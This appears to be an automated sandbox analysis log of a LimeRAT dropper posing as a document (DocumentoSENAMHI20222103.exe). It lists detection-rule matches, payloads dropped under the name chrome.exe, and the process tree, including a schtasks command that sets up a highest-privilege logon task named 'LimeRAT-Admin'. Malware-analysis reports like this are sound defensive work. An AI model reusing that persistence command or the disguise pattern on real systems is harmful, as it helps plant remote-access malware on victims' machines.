Source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: String function: 00BD4730 appears 34 times
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81070018910.0000000005E26000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80844565838.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80842292045.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81070163110.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81069901900.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83512915307.0000000005613000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameuser32j% vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80845816715.0000000005E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameuser32j% vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81073154674.0000000005E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83508026711.00000000047E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMultiRead.EXEB vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81066835085.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80842539174.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000000.78446193953.0000000000D13000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameMultiRead.EXEB vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80837083048.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81066992882.0000000005E18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81037251638.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81072098650.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81035574767.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81037950651.0000000005E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80844749588.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe Binary or memory string: OriginalFilenameMultiRead.EXEB vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wtqsCpda..exe.log
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@10/16@1/2
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe File read: C:\Users\user\Desktop\desktop.ini
Source: 15.2.wtqsCpda..exe.540000.0.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 15.2.wtqsCpda..exe.540000.0.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.2.chrome.exe.a20000.0.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 19.2.chrome.exe.a20000.0.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.0.wtqsCpda..exe.540000.1.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 15.0.wtqsCpda..exe.540000.1.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 18.0.chrome.exe.760000.0.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 18.0.chrome.exe.760000.0.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: chrome.exe.15.dr, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: chrome.exe.15.dr, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.0.chrome.exe.a20000.2.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 19.0.chrome.exe.a20000.2.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Chrome[1].exe.1.dr, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: Chrome[1].exe.1.dr, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.0.wtqsCpda..exe.540000.2.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 15.0.wtqsCpda..exe.540000.2.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 18.2.chrome.exe.760000.0.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 18.2.chrome.exe.760000.0.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.0.chrome.exe.a20000.1.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 19.0.chrome.exe.a20000.1.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.0.wtqsCpda..exe.540000.0.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 15.0.wtqsCpda..exe.540000.0.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.0.chrome.exe.a20000.3.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 19.0.chrome.exe.a20000.3.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.0.wtqsCpda..exe.540000.3.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 15.0.wtqsCpda..exe.540000.3.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.0.chrome.exe.a20000.0.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 19.0.chrome.exe.a20000.0.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: wtqsCpda..exe.1.dr, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: wtqsCpda..exe.1.dr, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD1B39 LoadLibraryExA,LoadLibraryExA,FindResourceA,LoadResource,SizeofResource,FreeLibrary, 1_2_00BD1B39
Source: DocumentoSENAMHI20222103.exe ReversingLabs: Detection: 16%
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe "C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe"
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Process created: C:\Users\user\AppData\Roaming\wtqsCpda..exe "C:\Users\user\AppData\Roaming\wtqsCpda..exe"
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\chrome.exe C:\Users\user\AppData\Local\Temp\chrome.exe
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'"
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
